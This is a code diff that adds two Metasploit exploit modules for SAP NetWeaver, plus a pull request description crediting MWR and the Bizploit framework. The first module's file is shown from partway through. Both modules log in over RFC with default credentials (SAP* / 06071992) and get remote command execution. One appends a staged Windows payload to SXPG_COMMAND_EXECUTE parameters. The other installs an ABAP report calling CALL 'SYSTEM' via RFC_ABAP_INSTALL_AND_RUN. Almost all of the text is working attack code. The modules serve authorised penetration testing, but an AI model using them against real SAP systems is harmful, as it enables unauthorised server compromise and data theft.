+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::EXE
+
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC SXPG_COMMAND_EXECUTE',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module exploits an arbitrary command execution vulnerability in the SXPG_COMMAND_EXECUTE Remote Function Call to deliver a custom payload. The exploit requires a valid command as configured in SM69, that accepts additional parameters. We're limited to approx. 256 chars, so don't set a PAYLOAD_SPLIT value higher than 250 to be on the safe side.
+                              The module also requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+                                {
+                                },
+      'Payload'        =>
+                                {
+                                #'BadChars' => "\x00\x3a\x3b\x3d\x3c\x3e\x0a\x0d\x22\x26\x27\x2f\x60\xb4",
+                                },
+      'Platforms'      => [ 'win' ],
+      'Targets'        =>
+                          [
+                            [
+                              'Windows Universal',
+                               {
+                                 'Arch' => ARCH_X64,
+                                 'Platform' => 'win'
+                               },
+                            ],
+                          ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 01 2012',
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+    register_options(
+                     [
+                       Opt::RPORT(3342),
+                       OptString.new('RHOST', [true, 'SAP Gateway', nil]),
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP router address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP router port number', nil]),
+                       OptString.new('CMD', [true, 'Command name as defined in SM49/SM69', 'LIST_DB2DUMP']),
+                       OptString.new('OS', [true, 'Operating System 1. ANYOS, 2. UNIX, 3. Windows NT, 4. AS/400, 5. OS/400', '3']),
+                       OptBool.new('VERBOSE', [false, "Be verbose", false])
+                     ], self.class)
+    register_advanced_options(
+                              [
+                                OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 250]),
+                              ], self.class)
+  end
+
+  def exploit
+    $first_pass = true
+    $user = datastore['USER'] if datastore['USER']
+    $pass = datastore['PASS'] if datastore['PASS']
+    if datastore['CLIENT']
+      $client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+    end
+    $rport = datastore['RPORT'].to_s.split('')
+    $sysnr = $rport[2]
+    $sysnr << $rport[3]
+    $rhost = datastore['RHOST']
+    $verbose = datastore['VERBOSE']
+   if datastore['SRHOST']
+#    if datastore['SRPORT']
+      $rhost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    if datastore['OS']
+      case(datastore['OS'])
+        when '1'
+          choice = "ANYOS"
+        when '2'
+          choice = "UNIX"
+        when '3'
+          choice = 'Windows NT'
+        when '4'
+          choice = 'AS/400'
+        when '5'
+          choice = 'OS/400'
+        else
+          print_error "Invalid OS!"
+          abort
+      end
+    end
+    $os = choice
+    $auth_hash = {"user" => $user, "passwd" => $pass, "client" => $client, "ashost" => $rhost, "sysnr" => $sysnr}
+    linemax = datastore['PAYLOAD_SPLIT']
+    print_status("Using custom payload size of #{linemax}") if linemax != "250"
+    execute_cmdstager({ :delay => 0.35, :linemax => linemax })
+    handler(nil)
+  end
+
+  def execute_command(cmd, opts)
+    rhost = $rhost
+    rport = $rport
+    client = $client
+    user = $user
+    pass = $pass
+    os = $os
+    cmd.each do |payload|
+      begin
+        conn = Connection.new($auth_hash)
+      rescue NWError => e
+        print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+        print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+        print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+        print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+        print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+        print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+        print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+        abort
+      end
+      print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}") if $first_pass == true
+      print_good("#{rhost}:#{rport} [SAP] Injecting payload into #{datastore['CMD']} via SXPG_COMMAND_EXECUTE RFC. We're limited to approx. 256 chars, be patient!") if $first_pass == true
+      $first_pass = false
+      begin
+        function = conn.get_function("SXPG_COMMAND_EXECUTE")
+        fc = function.get_function_call
+      rescue NWError => e
+        print_error("[SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+        abort
+      end
+      fc[:COMMANDNAME] = datastore['CMD'] if datastore['CMD']
+      fc[:OPERATINGSYSTEM] = os
+      fc[:ADDITIONAL_PARAMETERS] = " & #{payload.strip}"
+      begin
+        fc.invoke
+      rescue NWError => e
+        print_error("[SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+      end
+    conn.disconnect
+    end
+  end
+end

--- a/modules/exploits/securestate/sap_rfc_system.rb
+++ b/modules/exploits/securestate/sap_rfc_system.rb
@@ -1,0 +1,157 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# This module is based on, inspired by, or is a port of a plugin available in the Onapsis Bizploit Opensource ERP Penetration Testing framework - http://www.onapsis.com/research-free-solutions.php.
+# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts in producing the Metasploit modules and was happy to share his knowledge and experience - a very cool guy. 
+# I’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+require 'rubygems'
+begin
+  require 'nwrfc'
+rescue LoadError
+  abort("[x] This module requires the NW RFC SDK ruby wrapper (http://rubygems.org/gems/nwrfc) from Martin Ceronio.")
+end
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::EXE
+
+  include NWRFC
+
+  def initialize
+    super(
+      'Name'           => 'SAP RFC_ABAP_INSTALL_AND_RUN',
+      'Version'        => '$Revision$',
+      'Description'    => %q{
+                              This module exploits an arbitrary command execution vulnerability in the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to deliver a custom payload. We're limited to approx. 256 chars, so don't set a PAYLOAD_SPLIT value higher than 250 to be on the safe side.
+                              The module also requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
+                            },
+                              
+      'References'     => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+                                {
+                                },
+      'Payload'        =>
+                                {
+                                #'BadChars' => "\x00\x3a\x3b\x3d\x3c\x3e\x0a\x0d\x22\x26\x27\x2f\x60\xb4",
+                                },
+      'Platforms'      => [ 'win' ],
+      'Targets'        =>
+                          [
+                            [
+                              'Windows Universal',
+                               {
+                                 'Arch' => ARCH_X64,
+                                 'Platform' => 'win'
+                               },
+                            ],
+                          ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 01 2012',
+      'Author'         => [ 'nmonkee' ],
+      'License'        => BSD_LICENSE
+       )
+    register_options(
+                     [
+                       OptString.new('USER', [true, 'Username', 'SAP*']),
+                       OptString.new('PASS', [true, 'Password', '06071992']),
+                       OptString.new('CLIENT', [true, 'Client', '001']),
+                       OptString.new('SRHOST', [false, 'SAP router address', nil]),
+                       OptString.new('SRPORT', [false, 'SAP router port number', nil]),
+                       OptBool.new('VERBOSE', [false, "Be verbose", false])
+                     ], self.class)
+    register_advanced_options(
+                              [
+                                OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '250']),
+                              ], self.class)
+  end
+
+  def exploit
+    $first_run = true
+    linemax = datastore['PAYLOAD_SPLIT']
+    print_status("Using custom payload size of #{linemax}") if linemax != '250'
+    execute_cmdstager({ :delay => 0.35, :linemax => linemax })
+    handler(nil)
+  end
+
+  def execute_command(cmd, opts)
+    user = datastore['USER'] if datastore['USER']
+    pass = datastore['PASS'] if datastore['PASS']
+    if datastore['CLIENT']
+      client = datastore['CLIENT'] if datastore['CLIENT'] =~ /^\d{3}\z/
+    end
+    rport = datastore['rport']
+    rport = rport.to_s.split('')
+    sysnr = rport[2]
+    sysnr << rport[3]
+    rhost = datastore['rhost']
+    verbose = datastore['VERBOSE']
+  if datastore['SRHOST']
+#    if datastore['SRPORT']
+      $rhost = "/H/#{datastore['SRHOST']}/H/#{rhost}"
+#    end
+  end
+    auth_hash = {"user" => user, "passwd" => pass, "client" => client, "ashost" => rhost, "sysnr" => sysnr}
+    begin
+      conn = Connection.new(auth_hash)
+    rescue NWError => e
+      print_error("#{rhost}:#{rport} [SAP] login failed - credentials incorrect for client: #{client} username: #{user} password: #{pass}") if e.message =~ /Name or password is incorrect/  
+      print_error("#{rhost}:#{rport} [SAP] login failed - client #{client} does not exist") if e.message =~ /not available in this system/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (refused)") if e.message =~ /Connection refused/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (unreachable)") if e.message =~ /No route to host/
+      print_error("#{rhost}:#{rport} [SAP] login failed - communication failure (hostname unknown)") if e.message =~ /unknown/
+      print_error("#{rhost}:#{rport} [SAP] login failed - #{user} user account locked in client #{client}") if e.message =~ /Password logon no longer possible - too many failed attempts/
+      print_error("#{rhost}:#{rport} [SAP] login failed - password must be changed for #{client}:#{user}:#{pass}") if e.message =~ /Password must be changed/
+      abort
+    end
+    print_good("#{rhost}:#{rport} [SAP] Successful login - #{client}:#{user}:#{pass}") if $first_run == true
+    print_good("#{rhost}:#{rport} [SAP] Injecting payload via RFC_ABAP_INSTALL_AND_RUN RFC. We're limited to approx. 256 chars, be patient!") if $first_run == true
+    begin
+      function = conn.get_function("RFC_ABAP_INSTALL_AND_RUN")
+      fc = function.get_function_call
+    rescue NWError => e
+      print_error("[SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+      abort
+    end
+    code = "REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING." + "\r\n"
+    code << "TYPES lt_line(255) TYPE c." + "\r\n"
+    code << "DATA lv_cmd(255) TYPE c." + "\r\n"
+    code << "DATA lt_result TYPE STANDARD TABLE OF lt_line WITH HEADER LINE." + "\r\n"
+    code << "lv_cmd = "   
+    cmd.each do |payload|
+      split_str = payload.strip
+      payload_arr = split_str.scan(/.{1,20}/)
+      payload_arr.each do |small_payload|
+        if small_payload == payload_arr.last
+          code << "'#{small_payload}'." + "\r\n"
+        elsif
+          code << "'#{small_payload}' &" + "\r\n"
+        end
+      end
+    end 
+    code << "CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd" + "\r\n"
+    code << "ID 'TAB' FIELD lt_result-*sys*." + "\r\n"
+    code << "LOOP AT lt_result." + "\r\n"
+    code << "WRITE : / lt_result." + "\r\n"
+    code << "ENDLOOP." + "\r\n"
+    code.each {|line|
+      fc[:PROGRAM].new_row {|row| row[:LINE] = line.strip}
+    }
+    begin
+      fc.invoke
+    rescue NWError => e
+      print_error("[SAP] FunctionCallException - code: #{e.code} group: #{e.group} message: #{e.message} type: #{e.type} number: #{e.number}")
+    end
+    $first_run = false
+    conn.disconnect
+  end
+end


### PR DESCRIPTION
The majority of the modules rely on the SAP NW RFC SDK and require the
Ruby wrapper ‘nwrfc’ by Martin Ceronio. Unfortunately the NW RFC SDK is
available only to those who have access to the SAP Service Marketplace
(SMP). In order to get access to the SAP Marketplace you need an S-ID,
password and customer number. Alternatively the required library files
(such as libsapnwrfc) can be extracted from a SAP system (such as the
freely available test drive systems).

These third party requirements are one of the reasons that the
submission to the Metasploit Framework proved problematic.

The modules are based on, inspired by, or are a port of plugins
available in the Onapsis Bizploit Opensource ERP Penetration Testing
framework - http://www.onapsis.com/research-free-solutions.php.

See
http://labs.mwrinfosecurity.com/blog/2012/04/27/mwr-sap-metasploit-modul
es for more info.
